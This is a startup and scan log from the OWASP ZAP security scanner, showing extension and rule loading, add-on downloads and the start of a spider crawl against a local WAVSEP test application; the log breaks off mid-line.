Found Java version 1.7.0_91 Available memory: 3952 MB Setting jvm heap size: -Xmx512m 661 [main] INFO org.zaproxy.zap.DaemonBootstrap - OWASP ZAP 2.4.3 started. 1810 [main] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache open start 1831 [main] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache open end 2973 [main] INFO org.parosproxy.paros.common.AbstractParam - Setting config api.disablekey = true was null 2975 [main] INFO org.parosproxy.paros.network.SSLConnector - Reading supported SSL/TLS protocols... 2975 [main] INFO org.parosproxy.paros.network.SSLConnector - Using a SSLEngine... 3606 [main] INFO org.parosproxy.paros.network.SSLConnector - Done reading supported SSL/TLS protocols: [SSLv2Hello, SSLv3, TLSv1, TLSv1.1, TLSv1.2] 3610 [main] INFO org.parosproxy.paros.extension.option.OptionsParamCertificate - Unsafe SSL renegotiation disabled. 3632 [ZAP-daemon] INFO org.zaproxy.zap.control.ExtensionFactory - Loading extensions 6112 [ZAP-daemon] INFO org.zaproxy.zap.control.ExtensionFactory - Extensions loaded 7955 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Change user agent to other browsers. 7955 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Detect insecure or potentially malicious content in HTTP responses. 7955 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Detect and alert 'Set-cookie' attempt in HTTP response for modification. 7955 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Avoid browser cache (strip off IfModifiedSince) 7956 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Log cookies sent by browser. 7956 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Log unique GET queries into file:filter/get.xls 7969 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Log unique POST queries into file: filter/post.xls 7969 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Log request and response into file: filter/message.txt 7969 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Replace HTTP request body using defined pattern. 7969 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Replace HTTP request header using defined pattern. 7969 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Replace HTTP response body using defined pattern. 7969 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Replace HTTP response header using defined pattern. 7969 [ZAP-daemon] INFO org.parosproxy.paros.extension.filter.FilterFactory - loaded filter Send ZAP session request ID 9063 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Allows ZAP to check for updates 9095 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionViewOption 9095 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionEdit 9101 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionFilter 9101 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Provides a rest based API for controlling and accessing ZAP 9512 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionState 9512 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHistory 9526 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Show hidden fields and enable disabled fields 9527 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Search messages for strings and regular expressions 9527 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Encode/Decode/Hash... 9528 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Allows you to intercept and modify requests and responses 9528 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Passive scanner 9627 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Script passive scan rules 9640 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Application Error Disclosure 9640 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Incomplete or No Cache-control and Pragma HTTP Header Set 9640 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Content-Type Header Missing 9641 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Cookie No HttpOnly Flag 9641 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Cookie Without Secure Flag 9641 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Cross-Domain JavaScript Source File Inclusion 9641 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Web Browser XSS Protection Not Enabled 9641 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Secure Pages Include Mixed Content 9642 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Password Autocomplete in Browser 9642 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Private IP Disclosure 9642 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Session ID in URL Rewrite 9642 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: X-Content-Type-Options Header Missing 9642 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: X-Frame-Options Header Not Set 9688 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Allows you to view and manage alerts 9701 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Active scanner, heavily based on the original Paros active scanner, but with additional tests added 9717 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Spider used for automatically finding URIs on a site 9734 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing A set of common popup menus for miscellaneous tasks 9734 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Forced browsing of files and directories using code from the OWASP DirBuster tool 9735 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionManualRequest 9735 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Compares 2 sessions and generates an HTML file showing the differences 9735 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Invoke external applications passing context related information such as URLs and parameters 9736 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Handles anti cross site request forgery (CSRF) tokens 9750 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionAuthentication 11882 [ZAP-daemon] INFO org.zaproxy.zap.extension.authentication.ExtensionAuthentication - Loaded authentication method types: [Form-based Authentication, HTTP/NTLM Authentication, Manual Authentication, Script-based Authentication] 11883 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Creates a dynamic SSL certificate to allow SSL communications to be intercepted without warnings being generated by the browser 11883 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Logs errors to the Output tab in development mode only 11883 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionUserManagement 11884 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Summarise and analyse FORM and URL parameters as well as cookies 11884 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Script integration 11892 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Scripting console, supports all JSR 223 scripting languages 11892 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionForcedUser 11892 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Extension handling HTTP sessions 11905 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Zest is a specialized scripting language from Mozilla specifically designed to be used in security tools 12174 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionDiff 12174 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionRequestPostTableView 12174 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Simple browser configuration 12174 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionSessionManagement 12456 [ZAP-daemon] INFO org.zaproxy.zap.extension.sessions.ExtensionSessionManagement - Loaded session management method types: [Cookie-based Session Management, Http Authentication Session Management] 12456 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelRequestFormTableView 12457 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Capture messages from WebSockets with the ability to set breakpoints. 12468 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Summarise and analyse FORM and URL parameters as well as cookies 12468 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionAuthorization 12468 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing AJAX Spider, uses Crawljax 12469 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Handles adding Global Excluded URLs 12469 [ZAP-daemon] WARN org.zaproxy.zap.extension.globalexcludeurl.ExtensionGlobalExcludeURL - GlobalExcludeURL.optionsLoaded() 12469 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Adds menu item to refresh the Sites tree 12469 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Adds support for configurable keyboard shortcuts for all of the ZAP menus. 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing OWASP ZAP User Guide 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionReport 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Allows you to configure which extensions are loaded when ZAP starts 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelComponentonentAll 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelHexView 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelImageView 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelLargeRequestView 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelLargeResponseView 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelRequestQueryCookieTableView 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionHttpPanelSyntaxHighlightTextView 12470 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Quick Start panel 12471 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Translations of the core language files 12471 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Tips and Tricks 12471 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Passive Scan Rules 12471 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Allows to fuzz WebSocket messages. 12471 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Provides WebDrivers to control several browsers using Selenium and includes HtmlUnit browser. 12472 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Active Scan Rules 12472 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing The ZAP Getting Started Guide 12472 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing The Online menu links 12472 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing ExtensionSaveRawHttpMessage 12472 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Provides the foundation for concrete message types (for example, HTTP, WebSockets) expose fuzzer implementations. 12482 [ZAP-daemon] INFO org.parosproxy.paros.extension.ExtensionLoader - Initializing Allows to fuzz HTTP messages. 12482 [ZAP-daemon] WARN org.zaproxy.zap.extension.autoupdate.ExtensionAutoUpdate - No check for updates for over 3 month - add-ons may well be out of date 12483 [Thread-4] INFO org.zaproxy.zap.extension.dynssl.ExtensionDynSSL - Creating new root CA certificate 15620 [Thread-4] INFO org.zaproxy.zap.extension.dynssl.ExtensionDynSSL - New root CA certificate created 16299 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/sequence-alpha-2.zap 16299 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/ascanrulesAlpha-alpha-15.zap 16299 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/help_ja_JP-alpha-4.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/directorylistv2_3_lc-release-3.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/sqliplugin-beta-9.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/communityScripts-alpha-2.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/treetools-beta-6.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/soap-alpha-2.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/amf-alpha-1.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/zest-beta-20.zap 16300 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/help_pt_BR-release-5.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/alertFilters-beta-2.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/fuzzdb-release-3.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/beanshell-beta-5.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/saml-alpha-5.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/alertReport-beta-14.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/accessControl-alpha-1.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/browserView-alpha-4.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/selenium-release-5.zap 16301 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/tokengen-beta-10.zap 16302 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/highlighter-alpha-6.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/jruby-beta-4.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/jython-beta-4.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/requester-alpha-1.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/sniTerminator-alpha-3.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/domxss-alpha-2.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/pscanrulesBeta-beta-12.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/sse-alpha-8.zap 16314 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/revisit-alpha-1.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/customreport-alpha-1.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/portscan-beta-7.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/importLogFiles-alpha-3.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/httpsInfo-alpha-6.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/help_es_ES-alpha-4.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/wappalyzer-alpha-6.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/svndigger-beta-3.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/pscanrulesAlpha-alpha-8.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/help_bs_BA-alpha-4.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/importurls-beta-2.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/codedx-alpha-2.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/help_fr_FR-alpha-4.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/callgraph-alpha-3.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/ascanrulesBeta-beta-19.zap 16315 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Downloading add-on from: https://github.com/zaproxy/zap-extensions/releases/download/2.4/directorylistv2_3-release-3.zap 28846 [ZAP-ProxyThread-1] INFO org.zaproxy.zap.extension.httpsessions.ExtensionHttpSessions - Added new session token for site '172.17.0.2:8080': JSESSIONID 29043 [ZAP-ProxyThread-1] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 0, active=false, tokenValues=''] 30776 [ZAP-ProxyThread-2] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 1, active=false, tokenValues=''] 32148 [ZAP-ProxyThread-3] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 2, active=false, tokenValues=''] 34963 [ZAP-ProxyThread-6] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 3, active=false, tokenValues=''] 37063 [ZAP-ProxyThread-7] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 4, active=false, tokenValues=''] 39438 [ZAP-ProxyThread-9] INFO org.zaproxy.zap.extension.httpsessions.HttpSessionsSite - Created a new session as no match was found: HttpSession [name=Session 5, active=false, tokenValues=''] 40820 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/requester-alpha-1.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/help_ja_JP-alpha-4.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/sqliplugin-beta-9.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/communityScripts-alpha-2.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/amf-alpha-1.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/accessControl-alpha-1.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/sniTerminator-alpha-3.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/pscanrulesBeta-beta-12.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/customreport-alpha-1.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/revisit-alpha-1.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/importLogFiles-alpha-3.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/httpsInfo-alpha-6.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/sequence-alpha-2.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/treetools-beta-6.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/highlighter-alpha-6.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/domxss-alpha-2.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/codedx-alpha-2.zap 40821 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/sse-alpha-8.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/ascanrulesAlpha-alpha-15.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/beanshell-beta-5.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/saml-alpha-5.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/portscan-beta-7.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/tokengen-beta-10.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/pscanrulesAlpha-alpha-8.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/importurls-beta-2.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/callgraph-alpha-3.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/help_fr_FR-alpha-4.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/browserView-alpha-4.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/help_es_ES-alpha-4.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/alertFilters-beta-2.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/help_bs_BA-alpha-4.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/help_pt_BR-release-5.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/wappalyzer-alpha-6.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/svndigger-beta-3.zap 40822 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/zest-beta-20.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/ascanrulesBeta-beta-19.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/directorylistv2_3-release-3.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/directorylistv2_3_lc-release-3.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/fuzzdb-release-3.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/soap-alpha-2.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/alertReport-beta-14.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/jython-beta-4.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/jruby-beta-4.zap 40823 [ZAP-daemon] INFO org.parosproxy.paros.CommandLine - Add-on downloaded to: /home/zap/.ZAP/plugin/selenium-release-5.zap 41973 [Thread-60] INFO org.zaproxy.zap.extension.spider.SpiderThread - Starting spidering scan on SpiderApi-0 at Sat May 28 11:05:43 UTC 2016 41989 [Thread-60] INFO org.zaproxy.zap.spider.Spider - Spider initializing... 42117 [Thread-60] INFO org.zaproxy.zap.spider.Spider - Starting spider... 42133 [Thread-60] INFO org.zaproxy.zap.spider.Spider - Adding seed for spider: http://172.17.0.2:8080/wavsep/index-active.jsp 42138 [Thread-60] INFO org.zaproxy.zap.spider.Spider - Adding seed for spider: http://172.17.0.2:8080/robots.txt 42170 [Thread-60] INFO org.zaproxy.zap.spider.Spider - Adding seed for spider: http://172.17.0.2:8080/sitemap.xml 44459 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: WSDL File Passive Scanner 65697 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Charset Mismatch 65697 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Loosely Scoped Cookie 65697 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Absence of Anti-CSRF Tokens 65697 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Information Disclosure - Debug Error Messages 65697 [ZAP-daemon] INFO org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - loaded passive scan rule: Information Disclosure - Sensitive Informations in URL 65697 [ZAP-daemon] INFO 